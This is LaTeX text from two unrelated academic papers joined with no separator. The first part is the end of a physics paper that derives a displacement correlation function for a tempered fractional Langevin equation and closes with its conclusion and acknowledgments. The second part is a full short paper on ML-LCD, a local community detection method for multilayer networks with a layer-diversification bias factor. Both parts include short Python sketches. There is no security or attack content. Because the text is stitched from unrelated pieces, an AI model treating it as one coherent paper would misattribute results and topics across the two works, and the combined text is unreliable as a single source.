The approximation (\ref{3.34}) is valid just for small $\omega$; for large $\omega$, the convergence region of the approximation of $I(s)$ may be different from that of $I(s)$. One can note that the approximation in (\ref{3.34}) is not sensitive to the value of $H$, which is also illustrated by simulations (see Figs. \ref{you} and \ref{0-8}). We simply take $H=\frac{1}{2}$; for other values of $H$, one can use the techniques in \cite{Burov, Burov-1} to perform the inverse Laplace transform of $I(s)$, but the calculations are very complicated.
Then
\begin{eqnarray}\label{i}
I(s)\simeq\frac{s^{-1}(s+\lambda)}{(a-b)s^3+a\lambda s^2+m\omega^2s+m\omega^2\lambda}\simeq\frac{1+\lambda s^{-1}}{a\lambda s^2+m\omega^2s+m\omega^2\lambda}.
\end{eqnarray}
Rewrite (\ref{i}) as $a\lambda I(s)=\frac{1}{P(s)}+\frac{s^{-1}\lambda}{P(s)}$ with $P(s)=s^2+\frac{m\omega^2}{a\lambda}s+\frac{m\omega^2}{a}$. Then the solutions of $P(s)=0$ are $z_1=\alpha+\rmi\beta$ and $z_2=\alpha-\rmi\beta$, where $\alpha=-\frac{m\omega^2}{2a\lambda}$ and $\beta=\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda}$. The roots are complex on account of the small $\omega$ satisfying $m\omega^2<4a\lambda^2$. Denoting
\begin{eqnarray}
A_k=\frac{1}{\frac{\rmd P(s)}{\rmd s}|_{s=z_k}},\nonumber
\end{eqnarray}
we have
\begin{eqnarray}
a\lambda I(s)=\sum_{k=1}^{2}\frac{A_k}{s-z_k}+\lambda\sum_{k=1}^{2}\frac{A_ks^{-1}}{s-z_k}
\end{eqnarray}
and
\begin{eqnarray}\label{h}
a\lambda I(t)&=A_1\rme^{z_1t}+A_2\rme^{z_2t}+\lambda\left[\frac{A_1}{z_1}(\rme^{z_1t}-1)+\frac{A_2}{z_2}(\rme^{z_2t}-1)\right]\nonumber\\
&=(A_1+A_2+\lambda\frac{A_1}{z_1}+\lambda\frac{A_2}{z_2})\rme^{\alpha t}\cos(\beta t)\nonumber\\
&\quad +(A_1-A_2+\lambda\frac{A_1}{z_1}-\lambda\frac{A_2}{z_2})\rmi\rme^{\alpha t}\sin(\beta t)-\lambda(\frac{A_1}{z_1}+\frac{A_2}{z_2}),
\end{eqnarray}
where $A_1=\frac{1}{z_1-z_2}$ and $A_2=\frac{1}{z_2-z_1}$.
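The closed-form roots $z_{1,2}=\alpha\pm\rmi\beta$ used above can be cross-checked numerically against a direct polynomial solve of $P(s)=0$. A small sketch follows; the parameter values are purely illustrative and only need to satisfy the small-$\omega$ condition $m\omega^2<4a\lambda^2$:

```python
import numpy as np

def p_roots(m, omega, a, lam):
    """alpha and beta for the complex roots z = alpha +/- i*beta of
    P(s) = s^2 + (m*omega^2/(a*lam)) s + m*omega^2/a,
    valid in the small-omega regime m*omega^2 < 4*a*lam^2."""
    alpha = -m * omega**2 / (2 * a * lam)
    beta = omega * np.sqrt(4 * m * a * lam**2 - m**2 * omega**2) / (2 * a * lam)
    return alpha, beta

# illustrative parameters with m*omega^2 < 4*a*lam^2
m, omega, a, lam = 1.0, 0.08, 3.0, 0.1
alpha, beta = p_roots(m, omega, a, lam)
# direct solve of the monic quadratic P(s) for comparison
z = np.roots([1.0, m * omega**2 / (a * lam), m * omega**2 / a])
```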
Plugging the concrete expressions of $A_k$ into (\ref{h}) leads to
\begin{eqnarray}
I(t)=&\frac{1}{\sqrt{4m\omega^2a\lambda^2-m^2\omega^4}}\rme^{-\frac{m\omega^2}{2a\lambda} t}\sin\left(\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda} t\right)\nonumber\\
&-\frac{1}{m\omega^2}\rme^{-\frac{m\omega^2}{2a\lambda} t}\cos\left(\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda} t\right)+\frac{1}{m\omega^2}
\end{eqnarray}
and the normalized displacement correlation function is
\begin{eqnarray}\label{cx}
C_x(t)&=1-m\omega^2 I(t)\nonumber\\
&=2\lambda \sqrt{\frac{a}{4a\lambda^2-m\omega^2}}\rme^{-\frac{m\omega^2}{2a\lambda} t}\sin\left(\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda}t+\theta\right),
\end{eqnarray}
where $\theta=\arctan(-\frac{\sqrt{4ma\lambda^2-m^2\omega^2}}{m\omega})$. It shows that for small $\omega$, the phase, amplitude, and period are
$\theta$, $2\lambda \sqrt{\frac{a}{4a\lambda^2-m\omega^2}}\rme^{-\frac{m\omega^2}{2a\lambda} t}$, and $\frac{4 \pi a\lambda}{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}$, respectively, as verified by the simulations given in Figure \ref{you} (a) and Figure \ref{you} (b). The simulation results for $H=0.8$ are presented in Figure \ref{0-8}; panel (a) shows that, apart from a slight difference in amplitude, the simulation results remain consistent with Eq. (\ref{cx}) after changing the value of $H$. We numerically observe that $C_x(t)$ always exhibits zero crossings. For $\lambda\rightarrow 0$, the results for $C_x(t)$ of the fLe \cite{Burov} are recovered; see Figure \ref{wu}.
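As a basic consistency check of the closed form above, $I(0)=0$, so that $C_x(0)=1-m\omega^2 I(0)=1$ as required by the normalization of the displacement correlation function. A sketch, with purely illustrative parameter values satisfying $m\omega^2<4a\lambda^2$:

```python
import numpy as np

def I_closed(t, m, omega, a, lam):
    """Closed-form I(t) obtained from the residue computation, valid in the
    small-omega regime m*omega^2 < 4*a*lam^2 where the roots are complex."""
    root = np.sqrt(4 * m * a * lam**2 - m**2 * omega**2)
    decay = np.exp(-m * omega**2 / (2 * a * lam) * t)
    phase = omega * root / (2 * a * lam) * t
    return (decay * np.sin(phase) / (omega * root)
            - decay * np.cos(phase) / (m * omega**2)
            + 1.0 / (m * omega**2))

def C_x(t, m, omega, a, lam):
    """Normalized displacement correlation function C_x(t) = 1 - m*omega^2*I(t)."""
    return 1.0 - m * omega**2 * I_closed(t, m, omega, a, lam)
```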
\begin{figure}
\flushright
\includegraphics[scale=0.375]{6aeps.eps}\\
\includegraphics[scale=0.375]{6beps.eps}\includegraphics[scale=0.375]{6ceps.eps}\\
\includegraphics[scale=0.375]{6deps.eps}\\
\caption{Eq. (\ref{cx}) (blue solid line) and the simulation results sampled over $1.5\times10^4$ trajectories (red data points) with $\lambda=0.1$ and $m=1$, $\omega=0.08$ for (a), $\omega=0.3$ for (b), $\omega=0.965$ (just simulation one) for (c), and $\omega=3$ (just simulation one) for (d). For all the simulations, $H=0.6$.
}\label{you}
\end{figure}
\begin{figure}
\flushright
\includegraphics[scale=0.38]{8aeps.eps}\\
\includegraphics[scale=0.38]{8beps.eps}\includegraphics[scale=0.38]{8ceps.eps}\\
\includegraphics[scale=0.38]{8deps.eps}\\
\caption{
Eq. (\ref{cx}) (blue solid line) and the simulation results sampled over $1.5\times10^4$ trajectories (red data points) with $\lambda=0.1$ and $m=1$, $\omega=0.08$ for (a), $\omega=0.3$ (just simulation one) for (b), $\omega=0.965$ (just simulation one) for (c), and $\omega=3$ (just simulation one) for (d). For all the simulations, $H=0.8$.
}\label{0-8}
\end{figure}
\begin{figure}
\flushright
\quad\,\,\qquad\includegraphics[scale=0.38]{wuaeps.eps}\includegraphics[scale=0.38]{wubeps.eps}\\
\quad\quad\includegraphics[scale=0.38]{wuceps.eps}\\
\caption{Simulation results for $C_x(t)$ with $H=0.625$ and $\lambda=10^{-6}$, sampled over $10^4$
trajectories. (a): $\omega=0.3$, and the function decays monotonically; (b): $\omega=0.965$, the transition between the motions with and without zero crossing; (c): $\omega=3$, the underdamped regime. It shows that the simulation results are consistent with the theoretical ones in \cite{Burov} since $\lambda$ is very small.}\label{wu}
\end{figure}
\section{Conclusion}\label{four}
Tempered fractional Brownian motion is a recently introduced stochastic process displaying localized diffusion. We further discuss its ergodicity and derive its Fokker-Planck equation. Then we introduce the tempered fractional Langevin equation with tempered fractional Gaussian noise as the internal noise. Both the underdamped and overdamped cases are considered, and the evolution of the MSD is carefully investigated, revealing the transition processes of the MSD, which finally turns to ballistic diffusion at long times. The normalized displacement correlation function $C_x(t)$ of the tempered fractional Langevin equation with harmonic potential is explicitly derived for small frequency.
Using the algorithm provided in \ref{AppendixC}, almost all of the theoretical results are verified by numerical simulations.
\section*{Acknowledgments}
This work was supported by the National Natural Science Foundation of China under Grant No. 11671182.
The classic problem of community detection in a network graph corresponds to an optimization problem which is \textit{global}, as it requires knowledge of the \textit{whole} network structure. The problem is known to be computationally difficult to solve, while its approximate solutions have to cope with both accuracy and efficiency issues that become more severe as the network increases in size.
Large-scale, web-based environments have indeed traditionally represented a natural scenario for the development and testing of effective community detection approaches.
In the last few years, the problem has attracted increasing attention in research contexts related to \textit{complex networks}~\cite{Mucha10,CarchioloLMM10,PapalexakisAI13,Kivela+14,DeDomenico15,Loe15,KimL15,Peixoto15},
whose modeling and analysis are widely recognized as a useful tool to better understand the characteristics and dynamics of multiple, interconnected types of node relations and interactions~\cite{BerlingerioPC13,Magnanibook}.
Nevertheless, especially in social computing, one important aspect to consider
is that we might often want to identify the personalized network of social contacts of interest to a single user only. To this aim, we would like to determine the expanded neighborhood of that user which forms a densely connected, relatively small subgraph.
This is known as \textit{local community detection} problem~\cite{Clauset05,ChenZG09}, whose general objective is, given limited information about the network, to identify a community structure which is centered on one or few seed users.
Existing studies on this problem have focused, however, on social networks that are built on a single user relation type or context~\cite{ChenZG09,ZakrzewskaB15}.
As a consequence, they are not able to profitably exploit the fact that most individuals nowadays have multiple accounts across different social networks, or that relations of different types (i.e., online as well as offline relations) can be available for the same population of a social network~\cite{Magnanibook}.
In this work, we propose a novel framework based on the multilayer network model for the problem of local community detection, which overcomes the aforementioned limitations in the literature, i.e., community detection on a multilayer network but from a global perspective, and local community detection but limited to monoplex networks.
We have recently brought the local community detection problem into the context of multilayer networks~\cite{ASONAM16}, by providing a preliminary formulation based on an unsupervised approach. A key aspect of our proposal is the definition of similarity-based community relations that exploit both internal and external connectivity of the nodes in the community being constructed for a given seed, while accounting for different layer-specific topological information.
Here we push this research forward by introducing a parametric control of layer-coverage diversification into the similarity-based community relations used to discover the local community.
Our experimental evaluation conducted on three real-world multilayer networks has shown the significance of our approach.
\section{Multilayer Local Community Detection}
\label{sec:LCD}
\subsection{The \textsf{ML-LCD}\xspace method}
We refer to the multilayer network model described in~\cite{Kivela+14}.
We are given a set of layers $\mathcal{L}$
and a set of entities (e.g., users) $\V$. We denote with
$G_{\mathcal{L}} = (V_{\mathcal{L}}, E_{\mathcal{L}}, \V, \mathcal{L})$ the multilayer graph such that $V_{\mathcal{L}}$ is a set of pairs $v \in \V, L \in \mathcal{L}$, and $E_{\mathcal{L}} \subseteq V_{\mathcal{L}} \times V_{\mathcal{L}}$ is the set of undirected edges.
Each entity of $V$ appears in at least one layer, but not necessarily in all layers.
Moreover, in the following we will consider the specific case in which nodes connected through different layers correspond to the same entity in $\V$, i.e., $G_{\mathcal{L}}$ is a multiplex graph.
Local community detection approaches generally implement some strategy that at each step considers a node from one of three sets, namely: the community under construction (initialized with the seed node), the ``shell'' of nodes that are neighbors of nodes in the community but do not belong to the community, and the unexplored portion of the network.
A key aspect is hence how to select the \textit{best} node in the shell to add to the community to be identified.
Most algorithms, which are designed to deal with monoplex graphs, try to maximize a function in terms of the \textit{internal} edges, i.e., edges that involve nodes in the community, and to minimize a function in terms of the \textit{external} edges, i.e., edges to nodes outside the community. By accounting for both types of edges, nodes that are candidates to be added to the community being constructed are penalized in proportion to the amount of links to nodes external to the community~\cite{Clauset05}.
%
Moreover, as first analyzed in~\cite{ChenZG09}, considering the internal-to-external \textit{connection density} ratio (rather than the absolute amount of internal and external links to the community) allows for alleviating the issue of inserting many weakly-linked nodes (i.e., \textit{outliers}) into the local community being discovered.
In this work we follow the above general approach and extend it to identify local communities over a multilayer network.
Given $G_{\mathcal{L}} = (V_{\mathcal{L}}, E_{\mathcal{L}}, \V, \mathcal{L})$ and a seed node $v_0$, we denote with $C \subseteq \V$ the node set corresponding to the local community being discovered around node $v_0$; moreover, when the context is clear, we might also use $C$ to refer to the local community subgraph.
We denote with $S = \{v \in \V \setminus C \ | \ \exists ((u,L_i),(v,L_j)) \in E_{\mathcal{L}} \ \wedge \ u \in C\}$ the \textit{shell} set of nodes outside $C$,
and with
$B = \{ u \in C \ | \ \exists ((u,L_i),(v,L_j)) \in E_{\mathcal{L}} \ \wedge \ v \in S\}$ the \textit{boundary} set of nodes in $C$.
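To make the role of these sets concrete, the following sketch computes $S$ and $B$ from a flattened multiplex edge list. The dictionary-based representation (one set of undirected entity pairs per layer) is our own assumption for illustration, not part of the formal model:

```python
def shell_and_boundary(community, layer_edges):
    """Shell set S: entities outside C adjacent to some node of C in any layer.
    Boundary set B: entities of C adjacent to some node of S in any layer.

    `layer_edges` maps each layer name to a set of undirected entity pairs.
    """
    shell, boundary = set(), set()
    for edges in layer_edges.values():
        for u, v in edges:
            # check the edge in both directions, since it is undirected
            for a, b in ((u, v), (v, u)):
                if a in community and b not in community:
                    boundary.add(a)
                    shell.add(b)
    return shell, boundary
```

For example, with community $\{1,2\}$ and edges $(1,2),(2,3)$ in one layer and $(1,4)$ in another, the shell is $\{3,4\}$ and the boundary is $\{1,2\}$.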
Our proposed method, named {\em {\bf M}ulti{\bf L}ayer {\bf L}ocal {\bf C}ommunity {\bf D}etection} (\textsf{ML-LCD}\xspace), takes as input the multilayer graph $G_{\mathcal{L}}$ and a seed node $v_0$, and computes the local community $C$ associated to $v_0$ by performing an iterative search that seeks to maximize the value of \textit{similarity-based local community function} for $C$ ($LC(C)$), which is obtained as the ratio of an \textit{internal community relation} $LC^{int}(C)$ to an \textit{external community relation} $LC^{ext}(C)$. We shall formally define these later in Section~\ref{sec:funcsim}.
Algorithm \textsf{ML-LCD}\xspace works as follows. Initially, the boundary set $B$ and the community $C$ are initialized with the starting seed, while the shell set $S$ is initialized with the neighborhood set of $v_0$ considering all the layers in $\mathcal{L}$.
Afterwards, the algorithm computes the initial value of $LC(C)$ and starts expanding the node set in $C$:
it evaluates all the nodes $v$ belonging to the current shell set $S$, then selects the vertex $v^{*}$ that maximizes the value of $LC(C)$.
The algorithm checks if \textit{(i)} $v^{*}$ actually increases the quality of $C$ (i.e., $LC(C \cup \{v^{*}\})>LC(C)$) and \textit{(ii)} $v^{*}$ helps to strengthen the internal connectivity of the community (i.e., $LC^{int}(C \cup \{v^*\}) > LC^{int}(C) $).
If both conditions are satisfied, node $v^{*}$ is added to $C$ and the shell set is updated accordingly, otherwise node $v^{*}$ is removed from $S$ as it cannot lead to an increase in the value of $LC(C)$. In any case, the boundary set $B$ and $LC(C)$ are updated. The algorithm terminates when no further improvement in $LC(C)$ is possible.
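The greedy expansion just described can be sketched as follows. This is a simplified sketch, not the authors' reference implementation: the scoring functions `lc` and `lc_int` are passed in as callables, and the helper names are our own.

```python
def ml_lcd(seed, neighbors, lc, lc_int):
    """Greedy local-community search around `seed`.

    neighbors(v): all neighbors of entity v across the layers.
    lc(C), lc_int(C): community score and internal relation of node set C.
    """
    community = {seed}
    shell = set(neighbors(seed)) - community
    while shell:
        # pick the shell node maximizing the community score
        best = max(shell, key=lambda v: lc(community | {v}))
        grown = community | {best}
        if lc(grown) > lc(community) and lc_int(grown) > lc_int(community):
            community = grown
            shell |= set(neighbors(best))
            shell -= community
        else:
            shell.discard(best)  # cannot improve LC(C): drop it from the shell
    return community
```

On a toy graph made of two triangles joined by a bridge edge, seeding in one triangle with a density-style score recovers that triangle.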
\subsection{Similarity-based local community function}
\label{sec:funcsim}
To account for the multiplicity of layers, we define the multilayer local community function $LC(\cdot)$ based on a notion of similarity between nodes. In this regard, two major issues are how to choose the analytical form of the similarity function, and how to deal with the different, layer-specific connections that any two nodes might have in the multilayer graph.
We address the first issue in an unsupervised fashion, by resorting to
any similarity measure that can express the topological affinity of two nodes in a graph.
Concerning the second issue, one straightforward solution is to determine the similarity between any two nodes focusing on each layer at a time. The above points are formally captured by the following definitions.
We denote with $E^C$ the set of edges between nodes that belong to $C$ and with $E_i^C$ the subset of $E^C$ corresponding to edges in a given layer $L_i$. Analogously, $E^B$ refers to the set of edges between nodes in $B$ and nodes in $S$, and $E_i^B$ to its subset corresponding to $L_i$.
Given a community $C$, we define the \textit{similarity-based local community function} $LC(C)$ as the ratio between the \textit{internal community relation} and \textit{external community relation}, respectively defined as:
\begin{equation}\label{eq:Def2_Lin}
LC^{int}(C)=\frac{1}{|C|}\sum_{v \in C} \sum_{L_i \in \mathcal{L}} \sum_{\substack{(u,v) \in E_i^C \ \wedge \ u \in C}} sim_i(u,v)
\end{equation}
\begin{equation}\label{eq:Def2_Lex}
LC^{ext}(C) = \frac{1}{|B|} \sum_{v \in B} \sum_{L_i \in \mathcal{L}} \sum_{\substack{(u,v) \in E_i^B \ \wedge \ u \in S}} sim_i(u,v)
\end{equation}
In the above equations, function $sim_i(u,v)$ computes the similarity between any two nodes $u,v$ contextually to layer $L_i$. In this work, we define it in terms of Jaccard coefficient, i.e.,
$sim_i(u,v) = \frac{|N_i(u) \cap N_i(v)|}{|N_i(u) \cup N_i(v)|}$,
where $N_i(u)$
denotes the set of neighbors of node $u$ in layer $L_i$.
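A direct transcription of Eqs. (\ref{eq:Def2_Lin}) and (\ref{eq:Def2_Lex}) with the Jaccard-based $sim_i$ can be sketched as follows; the per-layer neighbor-map representation (layer $\mapsto$ node $\mapsto$ neighbor set) is our own assumption:

```python
def jaccard(u, v, nbrs):
    """sim_i(u, v): Jaccard coefficient of neighbor sets within one layer."""
    a, b = nbrs.get(u, set()), nbrs.get(v, set())
    union = a | b
    return len(a & b) / len(union) if union else 0.0

def lc_int(C, layers):
    """Internal community relation LC^int(C); `layers` maps each layer
    to a node -> neighbor-set dictionary."""
    total = sum(jaccard(u, v, nbrs)
                for nbrs in layers.values()
                for v in C
                for u in nbrs.get(v, set()) if u in C)
    return total / len(C)

def lc_ext(C, B, S, layers):
    """External community relation LC^ext(C) over boundary-to-shell edges."""
    total = sum(jaccard(u, v, nbrs)
                for nbrs in layers.values()
                for v in B
                for u in nbrs.get(v, set()) if u in S)
    return total / len(B) if B else 0.0
```

Note that, as in Eq. (\ref{eq:Def2_Lin}), each internal edge contributes twice, once for each of its endpoints $v \in C$.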
\subsection{Layer-coverage diversification bias}
When discovering a multilayer local community centered on a seed node, the iterative search process in \textsf{ML-LCD}\xspace that seeks to maximize the similarity-based local community measure explores the different layers of the network. This implies that the various layers might contribute very differently from each other in terms of edges constituting the local community structure.
In many cases, it can be desirable to control the degree of heterogeneity of relations (i.e., layers) inside the local community being discovered.
In this regard, we identify two main approaches:
\begin{itemize}
\item \textbf{Diversification-oriented approach.}
This approach relies on the assumption that a local community is better defined by increasing as much as possible the number of edges belonging to different layers.
More specifically, we might want to obtain a local community characterized by high diversification in terms of presence of layers and variability of edges coming from different layers.
\item \textbf{Balance-oriented approach.} Conversely to the previous case, the aim is to produce a local community that shows a certain \textit{balance} in the presence of layers, i.e., low variability of edges over the different layers.
This approach relies on the assumption that a local community might be well suited to real cases when it is uniformly distributed among the different edge types taken into account.
\end{itemize}
Following the above observations, here we propose a methodology to incorporate a parametric control
of the layer-coverage diversification in the local community being discovered.
To this purpose, we introduce a \textit{bias factor} $\beta$ in \textsf{ML-LCD}\xspace which impacts on the node similarity measure according to the following logic:
\begin{equation}
\beta=
\begin{cases}
(0, 1], & \textit{diversification-oriented bias}\\
0, & \textit{no bias}\\
[-1,0), & \textit{balance-oriented bias}
\end{cases}
\end{equation}
\noindent
Positive values of $\beta$ push the community expansion process towards a diversi\-fication-oriented approach, and, conversely, negative $\beta$ lead to different levels of balance-oriented scheme. Note that the \textit{no bias} case corresponds to handling the node similarity ``as is''.
Note also that, by assuming values in a continuous range, at each iteration \textsf{ML-LCD}\xspace is enabled to make a decision by accounting for a wider spectrum of degrees of layer-coverage diversification.
Given a node $v \in B$ and a node $u \in S$, for any $L_i \in \mathcal{L}$,
we define the $\beta$-biased similarity $sim_{\beta, i}(u,v)$ as follows:
\begin{eqnarray}
sim_{\beta, i}(u,v) = \frac{2sim_i(u,v)}{1+e^{-bf}},\\
bf=\beta[f(C \cup \{u\})-f(C)]
\end{eqnarray}
\noindent
where $bf$ is a \textit{diversification factor} and $f(C)$ is a function that measures the current diversification between the different layers in the community $C$; in the following, we assume it is defined as the standard deviation of the number of edges for each layer in the community.
The difference $f(C \cup \{u\})-f(C)$ is positive when the insertion of node $u$ into the community increases the coverage over a subset of layers, thus diversifying the presence of layers in the local community. Consequently, when $\beta$ is positive, the diversification effect is desired, i.e., there is a boost in the value of $sim_{\beta, i}$ (and vice versa for negative values of $\beta$).
Note that $\beta$ introduces a bias on the similarity between two nodes only when evaluating the inclusion of a shell node into a community $C$, i.e., when calculating $LC^{ext}(C)$.
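The biasing scheme can be sketched directly from the two formulas above; here $f(C)$ is the standard deviation of the per-layer edge counts, and the function names are our own:

```python
import math
import statistics

def layer_spread(per_layer_edge_counts):
    """f(C): standard deviation of the number of community edges per layer."""
    return statistics.pstdev(per_layer_edge_counts)

def biased_sim(sim, beta, f_with_u, f_without_u):
    """sim_{beta,i}(u, v) = 2*sim / (1 + exp(-bf)), with
    bf = beta * (f(C u {u}) - f(C)); beta = 0 leaves sim unchanged."""
    bf = beta * (f_with_u - f_without_u)
    return 2.0 * sim / (1.0 + math.exp(-bf))
```

With $\beta>0$, a candidate node whose insertion increases the layer spread gets its similarity boosted; with $\beta<0$ it is damped; and $\beta=0$ recovers the unbiased similarity, since the logistic factor reduces to $2/(1+e^0)=1$.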
\section{Experimental Evaluation}
\label{sec:results}
We used three multilayer network datasets, namely
\textit{Airlines} (417 nodes corresponding to airport locations, 3588 edges, 37 layers corresponding to airline companies)~\cite{Cardillo}, \textit{AUCS} (61 employees as nodes, 620 edges, 5 acquaintance relations as layers)~\cite{Magnanibook}, and \textit{RealityMining} (88 users as nodes, 355 edges, 3 media types employed to communicate as layers)~\cite{KimL15}. All network graphs are undirected, and inter-layer links are regarded as coupling edges.
\begin{table}[t!]
\caption{Mean and standard deviation size of communities by varying $\beta$ (with step of 0.1).}
\centering
\scalebox{0.8}{
\begin{tabular}{|l|l||c|c|c|c|c|c|c|c|c|c|c|}
\hline
dataset & & -1.0 & -0.9 & -0.8 & -0.7 & -0.6 & -0.5 & -0.4 & -0.3 & -0.2 & -0.1 & \cellcolor{blue!15}0.0 \\ \hline
\multirow{ 2}{*}{\textit{Airlines}} & \textit{mean} & 5.73 & 5.91 & 6.20 & 6.47 & 6.74 & 7.06 & 7.57 & 8.10 & 9.13 & 10.33 & \cellcolor{blue!15}11.33 \\
& \textit{sd} & 4.68 & 4.97 & 5.45 & 5.83 & 6.39 & 6.81 & 7.63 & 8.62 & 10.58 & 12.80 & \cellcolor{blue!15}14.78 \\ \hline
\multirow{ 2}{*}{\textit{AUCS}} & \textit{mean} & 6.38 & 6.59 & 6.64 & 6.75 & 6.84 & 6.85 & 6.92 & 7.13 & 7.16 & 7.77 & \cellcolor{blue!15}7.90 \\
& \textit{sd} & 1.48 & 1.51 & 1.59 & 1.69 & 1.85 & 1.85 & 1.87 & 2.15 & 2.18 & 2.40 & \cellcolor{blue!15}2.74 \\ \hline
\textit{Reality-} & \textit{mean} & 3.21 & 3.24 & 3.25 & 3.25 & 3.32 & 3.32 & 3.34 & 3.34 & 3.34 & 3.37 & \cellcolor{blue!15}3.37 \\
\textit{Mining} & \textit{sd} & 1.61 & 1.64 & 1.66 & 1.66 & 1.73 & 1.73 & 1.74 & 1.74 & 1.74 & 1.77 & \cellcolor{blue!15}1.77 \\
\hline
\end{tabular}
}
\\
\vspace{2mm}
\scalebox{0.8}{
\begin{tabular}{|l|l||c|c|c|c|c|c|c|c|c|c|}
\hline
dataset & & 0.1 & 0.2 & 0.3 & 0.4 & 0.5 & 0.6 & 0.7 & 0.8 & 0.9 & 1.0 \\ \hline
\multirow{ 2}{*}{\textit{Airlines}} & \textit{mean} & 9.80 & 9.02 & 8.82 & 8.37 & 8.20 & 7.93 & 7.53 & 7.26 & 7.06 & 7.06 \\
& \textit{sd} & 12.10 & 10.61 & 10.07 & 9.39 & 9.15 & 8.67 & 7.82 & 7.46 & 7.35 & 7.27 \\ \hline
\multirow{ 2}{*}{\textit{AUCS}} & \textit{mean} & 8.77 & 8.92 & 8.92 & 8.89 & 8.89 & 8.89 & 8.87 & 8.85 & 8.85 & 8.85 \\
& \textit{sd} & 3.16 & 3.33 & 3.33 & 3.27 & 3.27 & 3.27 & 3.26 & 3.23 & 3.23 & 3.23 \\ \hline
\textit{Reality-} & \textit{mean} & 3.38 & 3.39 & 3.39 & 3.39 & 3.36 & 3.36 & 3.32 & 3.18 & 3.17 & 3.17 \\
\textit{Mining} & \textit{sd} & 1.78 & 1.78 & 1.78 & 1.78 & 1.74 & 1.74 & 1.71 & 1.60 & 1.59 & 1.59 \\
\hline
\end{tabular}
}
\label{tab:size}
\end{table}
\textbf{Size and structural characteristics of local communities.\ }
We first analyzed the size of the local communities extracted by \textsf{ML-LCD}\xspace for each node.
Table~\ref{tab:size} reports on the mean and standard deviation of the size of the local communities as $\beta$ varies.
As regards the \textit{no bias} solution (i.e., $\beta=0.0$), largest local communities correspond to \textit{Airlines} (mean 11.33 $\pm$ 14.78), while medium-size communities (7.90 $\pm$ 2.74) are found for \textit{AUCS} and relatively small communities (3.37 $\pm$ 1.77) for \textit{RealityMining}.
The impact of $\beta$ on the community size is roughly proportional to the number of layers, i.e., high on \textit{Airlines}, medium on \textit{AUCS} and low on \textit{RealityMining}. For \textit{Airlines} and \textit{AUCS}, smallest communities are obtained with the solution corresponding to $\beta=-1.0$, thus suggesting that the discovery process becomes more xenophobic (i.e., less inclusive) while shifting towards a balance-oriented scheme.
Moreover, on \textit{Airlines}, the mean size follows a roughly normal distribution, with most inclusive solution (i.e., largest size) corresponding to the unbiased one. A near normal distribution (centered on $0.2 \leq \beta \leq 0.4$) is also observed for \textit{RealityMining}, while mean size values linearly increase with $\beta$ for \textit{AUCS}.
To understand the effect of $\beta$ on the structure of the local communities,
we analyzed the distributions of per-layer mean \textit{average path length} and mean \textit{clustering coefficient} of the identified communities (results not shown). One major remark is that on the networks with a small number of layers, the two types of distributions tend to follow an increasing trend for balance-oriented bias (i.e., negative $\beta$), which becomes roughly constant for the diversification-oriented bias (i.e., positive $\beta$). On \textit{Airlines}, variability happens to be much higher for some layers, which in the case of mean average path length ranges between 0.1 and 0.5 (as shown by a rapidly decreasing trend for negative $\beta$, followed by a peak for $\beta=0.2$, then again a decreasing trend).
\begin{figure}[t!]
\centering
\subfigure[\textit{Airlines}]{\includegraphics[width=0.32\columnwidth]{layers_per_communities_per_beta_lcd2_airlines.png}}
\subfigure[\textit{AUCS}]{\includegraphics[width=0.32\columnwidth]{layers_per_communities_per_beta_lcd2_aucs.png}}
\subfigure[\textit{RealityMining}]{\includegraphics[width=0.32\columnwidth]{layers_per_communities_per_beta_lcd2_rm.png}}
\caption{Distribution of number of layers over communities by varying $\beta$. Communities are sorted by decreasing number of layers.}
\label{fig:betalayers}
\end{figure}
\textbf{Distribution of layers over communities.\ }
We also studied how the bias factor impacts the distribution of the number of layers over communities, as shown in Figure~\ref{fig:betalayers}.
This analysis confirmed that using positive values of $\beta$ produces
local communities that lie on a higher number of layers. This outcome is easily explained, since positive values of $\beta$ favor the inclusion into the community of nodes that increase layer-coverage diversification, thus enabling the exploration of further layers even in an advanced phase of the discovery process. Conversely, negative values of $\beta$ are expected to yield a roughly uniform distribution of the layers covered by the community, thus preventing the discovery process from including nodes coming from unexplored layers once the local community is already characterized by a certain subset of layers.
As regards the effects of the bias factor on the layer-coverage diversification,
we analyzed the standard deviation of the per-layer number of edges by varying $\beta$ (results not shown, due to space limits of this paper).
As expected, standard deviation values are roughly proportional to the setting of the bias factor for all datasets.
Considering the local communities obtained with negative $\beta$, the layers on which they lie have a similar presence (in terms of number of edges) in the induced community subgraph.
Conversely, for the local communities obtained using positive $\beta$, the induced community subgraph may be dominated by a small subset of layers, while the other layers are present with a smaller number of relations.
\begin{figure}[t!]
\centering
\subfigure[\textit{Airlines}]{\includegraphics[width=0.45\columnwidth]{jac_log2_filter_airlines.png}}
\subfigure[\textit{AUCS}]{\includegraphics[width=0.45\columnwidth]{jac_log2_filter_aucs.png}}
\caption{Average Jaccard similarity between solutions obtained by varying $\beta$.}
\label{fig:betalayers_jac}
\end{figure}
\textbf{Similarity between communities.\ }
The smooth effect due to the diversification-oriented bias is confirmed when analyzing the similarity between the discovered local communities. Figure~\ref{fig:betalayers_jac} shows the average Jaccard similarity between solutions obtained by varying $\beta$ (i.e., in terms of nodes included in each local community). Jaccard similarities vary in the range $[0.75,1.0]$ for \textit{AUCS} and \textit{Airlines}, and in the range $[0.9,1.0]$ for \textit{RealityMining} (results not shown).
For datasets with a lower number of layers (i.e., \textit{AUCS} and \textit{RealityMining}), there is a strong separation between the solutions obtained for $\beta>0$ and the ones obtained with $\beta<0$.
On \textit{AUCS}, the local communities obtained using a diversification-oriented bias show Jaccard similarities close to $1$, while there is more variability among the solutions obtained with the balance-oriented bias. Effects of the bias factor are lower on \textit{RealityMining}, with generally high Jaccard similarities.
On \textit{Airlines}, the effects of the bias factor are still present but smoother, with gradual similarity variations in the range $[0.75,1.0]$.
\section{Conclusion}
\label{sec:conclusion}
We addressed the novel problem of local community detection in multilayer networks, providing a greedy heuristic that iteratively attempts to maximize the internal-to-external connection density ratio by accounting for layer-specific topological information.
Our method is also able to control the layer-coverage diversification in the local community being discovered, by means of a bias factor embedded in the similarity-based local community function.
Evaluation was conducted on real-world multilayer networks.
As future work, we plan to study alternative objective functions for the ML-LCD problem. It would also be interesting to enrich the evaluation with datasets providing ground-truth information.
We also envisage a number of application problems for which ML-LCD methods can profitably be used, such as friendship prediction, targeted influence propagation and, more generally, mining in incomplete networks.
